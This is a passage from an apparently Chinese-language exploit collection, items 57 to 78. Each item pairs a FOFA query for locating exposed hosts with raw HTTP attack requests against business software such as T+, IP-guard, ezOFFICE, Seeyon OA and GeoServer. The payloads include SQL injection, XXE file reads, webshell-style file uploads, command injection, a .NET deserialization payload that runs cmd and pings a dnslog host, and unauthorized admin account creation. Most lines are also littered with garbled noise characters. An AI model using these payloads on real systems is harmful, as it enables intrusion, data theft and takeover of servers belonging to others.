6 A* R& N |: @; H; ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36- `- P* @* T7 S5 s. R- D- _
Content-Type: application/json) n n% h5 \1 l4 T7 ~; T
/ h' t! t, B# k; f5 m2 m
{/ N5 h" |% v' M! _
"storeID":{; _/ Q# V; }5 k/ A1 r7 {
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",; [- W2 y3 d9 d; y+ _! g
"MethodName":"Start",
* ?2 d4 \- j! |! J% s "ObjectInstance":{
& V3 k! h3 t# m$ X "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 C+ W1 E* l$ M% z/ I
"StartInfo": {: ^4 a9 Z" n; L4 j( e; t7 Y& B
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 s' y1 I! h% m "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw", h2 g2 m6 b- C( G+ _/ ?. p
}
9 n& H2 Z0 u7 T$ _7 L }
7 I0 m8 |! S- U }
& k+ \: b7 R' P+ J3 k3 d/ ~}
, H( W: x0 { v9 `/ [9 c' g3 Q3 Y, |0 Y9 c; D6 m) T
' t" _) P% _& [, u2 c! j( Y57. 畅捷通T+ keyEdit.aspx SQL注入
8 S% I' g* Q( J* M( o; l& r# q+ s) RFOFA:app="畅捷通-TPlus"0 |6 w+ T0 B8 s1 X4 W4 |
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" |" ]" d$ \: J/ v! B
Host: host
. i* E% d* c( ^. ^$ k3 OUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 j: S, v# F7 j$ ]6 e8 B
Accept-Charset: utf-8
6 n$ } s' P$ h( wAccept-Encoding: gzip, deflate
6 z7 C( \1 @* |9 ?3 S5 N! ^Connection: close
^6 Z* {) n4 u8 o6 K! B/ D6 z. \: @, e
: A' o) `) h8 n& V" p9 l0 B
58. 畅捷通T+ KeyInfoList.aspx sql注入; Z( M: Y& L b: J! ?
FOFA:app="畅捷通-TPlus"
3 {$ }6 g( Q4 Q7 xGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1, x" _" n- i% N4 W+ o* J& R
Host: your-ip+ F; j; z" y6 o. l
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 _7 `) J# o1 E/ l v
Accept-Charset: utf-82 B$ c9 y: C5 O2 L6 X
Accept-Encoding: gzip, deflate
' j) k+ K' B+ y( b2 YConnection: close
+ ]" V4 P' A0 r; C. p% u/ J' Y9 N9 M5 V
% |0 j) Q* E8 l z6 ]7 p3 Q8 M; t6 r# Q1 w) R
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行6 z# x0 k1 J9 T5 q& S0 Q1 m
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"8 _/ ^* ?( L4 |8 L' J
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
6 v3 `1 @+ H( i) f4 _8 ], ZHost: 192.168.86.128:9090$ _# t8 z8 O4 ?
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+ F0 s4 [ ?' P/ pConnection: close
0 g$ e" v, T6 u$ M/ F( m y0 IContent-Length: 1669
( J: b; L/ G7 n7 Q( B! RAccept: */*
. V' b. x. _7 K. sAccept-Language: en
/ h: J* v0 k. H; y6 }0 Q; PContent-Type: application/x-www-form-urlencoded
& t- \+ Y( q- J& F% [ VAccept-Encoding: gzip
$ [+ g( S7 O- D' H \6 Q# D+ x* j) w4 S& ^% S6 _& m0 d
PAYLOAD
' H: c2 ~. ?$ O. Y: H/ l
# @4 p2 ?* O& r
[% T& s, A4 [$ O( T( ^60. 百卓Smart管理平台 importexport.php SQL注入# `, _* K5 h$ F: N4 `" D
FOFA:title="Smart管理平台"
2 X* e$ h2 ^- XGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1* W; o) L: P. `
Host:+ R2 B* b1 `' J5 ^( n( u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. {0 |% x: _9 U9 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# v8 ?0 l \# _6 yAccept-Encoding: gzip, deflate
9 ~* V4 E. ?* m( M( w3 fAccept-Language: zh-CN,zh;q=0.9& k7 w8 n7 M6 s3 Y
Connection: close
8 W6 X/ y4 `. j ?# k. N
+ o% o* e1 h( Y$ o
+ T3 R/ V. ]" e: z! I4 w4 Q0 O I61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 b' r. p/ ?. N4 _4 O1 l0 p
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
7 j' F V) @- pPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1$ L7 @, `; J. Y3 {" L
Host: x.x.x.x
1 _: ], B* Y! o/ oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: M9 @/ g& m9 N- MConnection: close
: A$ e- B' ]& x3 pContent-Length: 27
) z* h" _6 L# E3 s* BAccept: */*3 \8 q2 B3 ] S' S: x
Accept-Encoding: gzip, deflate3 Q) }5 @/ T) A. g a+ U
Accept-Language: en
5 f' C0 f* h1 M1 ^Content-Type: application/x-www-form-urlencoded! n( v: @1 Z; g
& s- i* u- l! A4 H2 J" B8uxssX66eqrqtKObcVa0kid98xa
$ A! c0 P* A" B# R- O! W6 y- d& _ x# S4 l. A
+ R; `( i5 p0 |
62. IP-guard WebServer 远程命令执行
' H; g6 J5 u) v/ Q' o0 M$ }5 mFOFA:"IP-guard" && icon_hash="2030860561"9 t. Q: L, f* o) c* V$ H
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: R' e$ j) v' {' h$ @$ R, j5 xHost: x.x.x.x- Z; f( ~3 r1 f1 i- f" G
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36/ z: L# Y% k$ h2 \7 g& }
Connection: close/ V, X2 c1 l4 t, z' c$ u
Accept: */*
( N9 E: U, W) V9 o; Z6 H& S3 GAccept-Language: en
# k4 [7 r: \. N1 cAccept-Encoding: gzip+ Z% f2 Q- Y Y+ [2 J
1 b6 X9 {" _, C7 e# Q0 C
+ ^% Z C$ @4 p5 X访问
+ t. W$ }% g, g
4 k, @7 I% g3 G% q2 P3 w: JGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
" f" H" n" S/ ?' l$ s0 u' EHost: x.x.x.x/ D* E- G$ S6 b- p
+ S0 H; U8 W1 j
& ^- H2 a7 v U- e2 |$ \7 D
63. IP-guard WebServer任意文件读取! X$ b: V7 X9 z' T S
IP-guard < 4.82.0609.0
: A/ y* v) u3 m% t) X$ y& pFOFA:icon_hash="2030860561"
: G& k; J8 B/ ~$ w. I* gPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
1 D) x" Q0 R9 YHost: your-ip
3 K! \2 u' m6 G0 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% }" V! |" s# t- i, P [$ I( |$ TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ [7 Q' D$ ?' d" KAccept-Encoding: gzip, deflate* s F& s" i$ W B; A0 u
Accept-Language: zh-CN,zh;q=0.9$ E; X' A' W. @& P& ]( |2 F6 b
Connection: close% o1 j2 t4 n2 {' m
Content-Type: application/x-www-form-urlencoded
1 @0 \- W: r# k' Z$ o6 q9 U7 I+ M0 e$ J$ |& ?1 N4 @' m5 Z
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A1 k: T9 Q, W5 J3 V2 F0 w" O
' E/ E1 D) v. K* w2 K e. X1 _64. 捷诚管理信息系统CWSFinanceCommon SQL注入
1 T2 e* S% G. lFOFA:body="/Scripts/EnjoyMsg.js"6 d7 n6 F8 [+ H& N' l( M
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.13 N1 T# `' }& i5 c( C
Host: 192.168.86.128:9001
* u( U. @5 ^( ^User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.362 [% c. W7 a0 T( K, o
Connection: close/ i: N6 S5 L+ k* V5 ?3 A& E
Content-Length: 369
" @) {; b# n& L0 m6 _Accept: */*
& o6 ^4 R2 A" P* j, `Accept-Language: en& L7 p8 p$ S, o& s% g6 U
Content-Type: text/xml; charset=utf-8
" j, z+ M. i9 B; F& PAccept-Encoding: gzip
+ Z9 `2 s2 V' o8 ^& ^! Z& h( r
% `6 Q$ ~' @: e5 z<?xml version="1.0" encoding="utf-8"?>. X$ h j% m, c
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 X5 g" q7 q3 H# ?0 |: Z2 F<soap:Body>
3 }# e9 O, A9 x2 f <GetOSpById xmlns="http://tempuri.org/">' F, ]! J/ |8 ~+ ]% m
<sId>1';waitfor delay '0:0:5'--+</sId> @& r5 |% a& T
</GetOSpById>
4 }$ C8 {$ U3 o+ _ </soap:Body>! }" s @3 L& o5 @+ w8 H* @
</soap:Envelope> U5 k) R4 h9 l5 j
) P' e( N. g. j6 J* |2 k) v% C( u' Z
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过! L- g9 ? ^/ L. {( G
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"8 Z" q" k8 G: A2 S. @( e
响应200即成功创建账号test123456/1234561 J, r+ @/ S: G# T ~
POST /SystemMng.ashx HTTP/1.1
1 _7 Q+ g$ D8 e! vHost:! z% O6 s/ d: E. n# U
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
1 p+ m# A/ a0 O6 f6 F+ @5 v( IAccept-Encoding: gzip, deflate
+ Y2 Q/ P+ E7 K, q+ a. v" p9 HAccept: */*
A6 u+ y( @8 G) g# s3 L z% r/ P* jConnection: close/ g8 I9 d& v( T1 I6 k2 H7 y2 m
Accept-Language: en( D1 t) I2 _% a; `
Content-Length: 174
) Q8 g/ L& w1 |, V" d* N" q' F
1 y( t$ t, W3 m3 E5 p" F1 ZoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
1 \. |4 ?8 X$ f8 R3 t% W4 s6 @# z! K6 f# A
' c7 {, W% k5 @% m. I7 S9 X66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 l. \8 K. o9 t! }5 E
FOFA:app="万户ezOFFICE协同管理平台"" s- Z$ d' v1 o7 A# |/ U# v
) i# Z- M$ }+ U+ Y3 Q9 x
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1) P+ u! }4 L+ ]& ~( p
Host: x.x.x.x
8 l' R5 o3 `( K8 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 Q! H2 f1 T8 s* s3 PConnection: close6 {" d' W% o/ u+ T3 y0 D# T
Accept: */*
( N) d$ y) f- jAccept-Language: en0 V# X+ j5 z) @' z* {) w; T) D
Accept-Encoding: gzip5 c7 A* ~4 g7 g+ j" F5 P
/ j( \. I; o% k2 \# Y& `
! o8 c& w0 B$ w第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
5 q- h9 m8 I; d j
1 ], c( i% d* c5 |67. 万户ezOFFICE wpsservlet任意文件上传
* S6 [8 ]% h" l) l- x5 V {FOFA:app="万户网络-ezOFFICE"
- \, {3 p& D Q: |6 ~+ SnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
; i+ q! ]0 N7 P$ T2 `% n. z0 H8 GPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1( f- A* \7 r' A
Host: x.x.x.x$ G6 j+ B H8 W m& H
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0* o& E* `2 n; }" a. |
Content-Length: 1732 B5 t3 H$ Q2 L* O+ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8! W2 e! S. w3 D' x& R8 N
Accept-Encoding: gzip, deflate3 D# J" p7 ^( J0 B9 }# A( I2 \8 n
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.35 t& s ^; G( G# z& z
Connection: close
6 c$ K. K% S% V; ?7 L- F# c7 DContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
D5 N, B* C' _5 L8 PDNT: 1
u5 j3 s0 M# Y8 U1 q& YUpgrade-Insecure-Requests: 1! O/ v' f/ P3 c; H/ g* @
4 G' z( q0 |' a, A' v
--ufuadpxathqvxfqnuyuqaozvseiueerp- n @9 n, @; k
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"! d1 J2 c3 R% ~8 v: Q0 P
7 {( L- @% U: L: p
<% out.print("sasdfghjkj");%>
% A( M/ U E0 | f _--ufuadpxathqvxfqnuyuqaozvseiueerp--5 Q" E6 r1 L! b$ g4 d
7 P7 f' j/ @3 @5 B, J* {4 N8 C# G- }1 e" O- {1 }
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
$ S) B7 h1 O+ v
r {7 V3 b& H g3 r' w3 s; \9 I4 e68. 万户ezOFFICE wf_printnum.jsp SQL注入2 P$ x- g3 U; }( v& x
FOFA:app="万户ezOFFICE协同管理平台"
4 O0 e: f! F' T# dGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1. t9 I. v! y: V! D: x3 o+ K6 Q9 q
Host: {{host}}, t" Y" N) ]0 X+ I# l: D% T" @7 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36. E# H/ t; `2 B& ]$ c
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.83 t7 g' u; g0 F2 f, ^
Accept-Encoding: gzip, deflate
$ H# M! G& s/ B9 [$ H, TAccept-Language: zh-CN,zh;q=0.9
2 N8 j9 n( p9 Z. F; `% hConnection: close- K4 ]4 Y9 R3 w* X4 x" P7 N l
7 [( Z$ u0 S6 l) s
+ J% K& u" L9 [( ^' }) G69. 万户 ezOFFICE contract_gd.jsp SQL注入0 A/ p1 p8 S: m5 O
FOFA:app="万户ezOFFICE协同管理平台"
+ ?7 W) Q4 W) Y1 ], G7 {GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1, P, M c" G# R8 x- U4 K7 i% T
Host: your-ip
. F* s. ^- a9 ?0 QUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
& J' X( ~! J) s' x/ ?. c1 U. PAccept-Encoding: gzip, deflate
5 W3 A% u/ C% u9 F+ KAccept: */*
8 `& S" L; [& C% ^3 jConnection: keep-alive! @: p. x8 }3 K8 P- v: n: p
' `5 V* ^4 R! H
: T, G1 y; j0 e/ s% l, c70. 万户ezEIP success 命令执行
g* j1 W7 g" C! s: tFOFA:app="万户网络-ezEIP"# P9 c a8 O) p$ Q+ [
POST /member/success.aspx HTTP/1.16 X6 b; ~8 x3 S
Host: {{Hostname}}
/ Z( z& [: ?* p* G6 H/ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& E% m" p, F# |SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
. w$ Z/ Q: h1 x0 B. @: u9 s& s0 @Content-Type: application/x-www-form-urlencoded, w# e$ j5 p& k$ R# c
TYPE: C$ X3 I, O E+ V3 l6 A+ Z
Content-Length: 16702
+ C( _- C* Q6 n- E7 u& c
% n* O1 c+ I& W) ?0 k# Q__VIEWSTATE=PAYLOAD2 @0 k7 w) n* W8 @ l! k5 j
! N( K+ H5 q6 n i% {
0 V2 H* j3 M8 N7 D! F5 |' ?" @9 D71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入+ N9 E* f& ?: b- k& U" [& Q
FOFA:body="PM2项目管理系统BS版增强工具.zip"
1 `8 b6 M# ?1 K: O( LGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
0 J$ z; s3 h. G( r" |* `) E9 D- BHost: x.x.x.xx.x.x.x
3 \2 X8 }0 Q$ A$ _, v/ w# i, a% Z0 {User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, c+ \, m0 O; @% ? ]0 G7 pConnection: close
# B s( y2 _* I: K+ h# @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# n3 x( N( @% U, iAccept-Encoding: gzip, deflate* j" U U% Z, r0 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 _: S2 Q/ j6 l$ s" w
Upgrade-Insecure-Requests: 1
2 S" C O# s2 T8 j) W. r8 F0 ^0 [4 u
9 ^; s( V8 a! r" W# v$ N) _, N& f
72. 致远OA getAjaxDataServlet XXE
8 f0 d. Q+ o3 s- U; PFOFA:app="致远互联-OA"- A: G! a% g& v* o+ B# ?4 c. z
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.18 o3 b" C+ h4 S, w7 k. G: O* W
Host: 192.168.40.131:8099
5 L* r0 `3 C& \3 C! I$ X2 A: e- M# IUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.365 {' t5 }8 G1 l( S$ c
Connection: close
& f! A0 d/ r& @# C3 bContent-Length: 583# [: H5 X, j/ @% x' j; |
Content-Type: application/x-www-form-urlencoded
# g& j: u3 H \. |/ I/ y' ~Accept-Encoding: gzip
6 w" F6 d) ~7 V+ {" \4 n3 x
2 r4 p8 B" J) [2 A( ]1 o! OS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E& u' }& I: x; h4 G- j; w4 `# K0 X. y
7 {8 e& Z/ `- D6 E1 ? v
' R7 I# K4 P! x1 f/ q; D
73. GeoServer wms远程代码执行. R6 X* b* E( p5 i& Y4 W( a% }
FOFA:icon_hash=”97540678”% W. t3 Z3 b# V7 Y
POST /geoserver/wms HTTP/1.1
2 }: x- g. P. I. d6 DHost:
8 }2 h4 c* }: ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ o5 V7 H X" Z7 r: D) N% b
Content-Length: 1981) d9 d- B9 a' b
Accept-Encoding: gzip, deflate5 L1 i1 @4 P8 K/ }5 C
Connection: close% r5 R8 k0 H: O, x
Content-Type: application/xml1 r0 ?- c$ _* a
SL-CE-SUID: 3* u+ d- }6 s) h, H
- \: D/ s7 t. Y. N
PAYLOAD
3 Q5 l4 I2 n" c# b! E2 V7 O, f8 I' |/ b2 t9 M
$ p2 ~ u) Y7 G8 @8 e4 f74. 致远M3-server 6_1sp1 反序列化RCE3 _' m; [7 z8 Y# ?
FOFA:title="M3-Server"
& x0 s5 Z j7 ?* K9 l X; MPAYLOAD
2 F* @$ ^! V7 {# W C
) ]# N, n2 R8 K5 Z5 C) j( u+ e75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE+ p) ?6 }. ~5 s) e7 }
FOFA:app="TELESQUARE-TLR-2005KSH". X" ~& x5 M/ L" j/ h5 i' A. Q$ `
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
; ?5 m; f0 U0 V+ {0 lHost: x.x.x.x9 I1 D9 }* W& ?- q' [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' ?+ O5 P/ F0 D* r! ]
Connection: close4 J p8 I& E. K6 H" m
Accept: */*
6 h0 c- y! r7 x: gAccept-Language: en, {8 T* } O1 i) C# O
Accept-Encoding: gzip+ p t" d h9 N
* K; y4 U W3 [ `7 P" Z
" @0 P# _. S& i$ d6 YGET /cgi-bin/test28256.txt HTTP/1.1
. _0 C, H% r" o ] h( e/ ` c/ AHost: x.x.x.x: J' P7 N& f3 I, ?9 Q( a& C/ f
6 n, \' L+ A# j: I+ k/ g* g( b8 W
& y. v5 |" ]% G% |76. 新开普掌上校园服务管理平台service.action远程命令执行
$ u1 q1 H0 @4 @7 iFOFA:title="掌上校园服务管理平台"$ i" u; q+ O/ M0 }5 n
POST /service_transport/service.action HTTP/1.1
* y4 r$ k2 a0 Q4 MHost: x.x.x.x
0 W$ D) n% l' {: _3 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.07 b7 u/ G% U1 E. X7 N3 ]- Q
Connection: close
1 J' B5 V3 \5 q2 N) } ^Content-Length: 211& l* p& w* Q5 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 s' O. I* q$ b8 y/ ?1 W
Accept-Encoding: gzip, deflate
5 k6 @& }8 G2 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! s* b+ `; d( u6 W* w$ q0 M
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4$ J) N/ T( a) l' @3 x0 |- \
Upgrade-Insecure-Requests: 1
, C. G7 @% T8 n6 u& t
8 C3 S0 |* e1 c: k9 P{
7 ^8 I! _* S; ?) D' f"command": "GetFZinfo",
( U1 b2 J( P0 T( d b' {7 ~ P7 u "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 ]: g) y$ I- X* ~ ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"5 q: n3 X% J1 H+ N
}; y- D/ {7 s1 J& z2 N! E6 h
7 G3 O4 Q. W S# @6 W
5 r w! y: Z' g1 a% D h, E: h" |GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
9 j$ C% P& ]: b1 n. }' j. r+ {, wHost: x.x.x.x
6 h0 t$ q& [7 R: y; a- }8 {6 Q) }* O' G" T6 q& K T: m- a
, t- F# W) W4 ]4 y
- k3 D) p, W0 r- L9 Y* }
77. F22服装管理软件系统UploadHandler.ashx任意文件上传* j- s/ _) ?- X) F. S1 A3 j0 _
FOFA:body="F22WEB登陆"9 b+ D$ ?! o& S Z: F
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1) \; ^; a$ k0 I8 K* m
Host: x.x.x.x
3 e9 P j0 X& ?5 J5 i" ~, k+ y, kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 \! w; H1 p& F/ n+ O
Connection: close7 {; y' c, \3 ^" d
Content-Length: 433
* o! V9 K3 l: r- G$ f" C2 U- ?Accept: */*, j% B# B" `" A. H
Accept-Encoding: gzip, deflate
( g ^$ b$ a' Y- ]: sAccept-Language: zh-CN,zh;q=0.9, \, ?7 {0 y4 n0 V' \
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix" G; C& n4 l9 X/ I. P- n: {% X6 V
! R9 C* S( ~, W' [. @0 H
------------398jnjVTTlDVXHlE7yYnfwBoix
% o: Y! `% ^, m+ K* ?2 w ]4 I) a5 MContent-Disposition: form-data; name="folder"
) s5 h+ o2 M+ Z* M7 G. c% _# [% C2 ?& L0 A* f) J
/upload/udplog
( _ q. Y. |: o------------398jnjVTTlDVXHlE7yYnfwBoix
; w/ q; T0 Q) FContent-Disposition: form-data; name="Filedata"; filename="1.aspx"! G/ I1 q, r# m0 k* Y" g* l( E
Content-Type: application/octet-stream
2 Z% B, @# S- z' R9 @% Z% [. |
" p1 E: n% Z6 A. @0 R( ghello1234567
2 C# H2 J7 n# \2 z' s------------398jnjVTTlDVXHlE7yYnfwBoix
7 @4 F/ _6 u2 Y2 @0 nContent-Disposition: form-data; name="Upload"
; A" ?' h3 Y, H( a
! {5 w" b5 K6 s5 ZSubmit Query
& B1 W* S7 P* n3 d------------398jnjVTTlDVXHlE7yYnfwBoix--3 V- T+ I$ M# T4 A0 Y
f6 a2 M0 H* ?: m+ i- {) @
( x4 \( ]8 S7 k$ X$ ]8 y% ^2 P# ]. b3 f78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) [. Z6 f$ h/ s+ l# A
FOFA:icon_hash="2001627082"
$ ~8 u3 N" @. K N3 xPOST /Platform/System/FileUpload.ashx HTTP/1.1
$ L5 L6 E. U5 f4 o2 x4 HHost: x.x.x.x, j9 Z. H- a, s, Q6 f- x6 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 z$ ~: O% q( I9 T) P
Connection: close" Z) Q. g( @0 _9 X, j- w
Content-Length: 336
# b; K& d4 @6 WAccept-Encoding: gzip0 A! g1 I H5 z$ a x" p
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l4 |2 H5 o9 k" P* f# e$ e( q
" v. i& w3 f0 j2 A% [1 p H
------YsOxWxSvj1KyZow1PTsh98fdu6l; ], d' K8 U4 ]0 A
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
2 b/ L: f) |: E6 w7 `Content-Type: image/png
4 n/ [. m# y' j2 f$ Z7 }$ X. @* |4 v h
YsOxWxSvj1KyZow1PTsh98fdu6l$ a+ M( P* N9 j
------YsOxWxSvj1KyZow1PTsh98fdu6l
# q2 j& J' R2 `, e _7 GContent-Disposition: form-data; name="target"
0 [3 l$ J: o- g' ]" L M) h4 |
: F8 M2 c% l1 N( A" s/Applications/SkillDevelopAndEHS/' } v4 z1 ~5 [
------YsOxWxSvj1KyZow1PTsh98fdu6l--, j( r# R7 O1 f
3 X- |" @6 m. w0 Y% j* ?" }
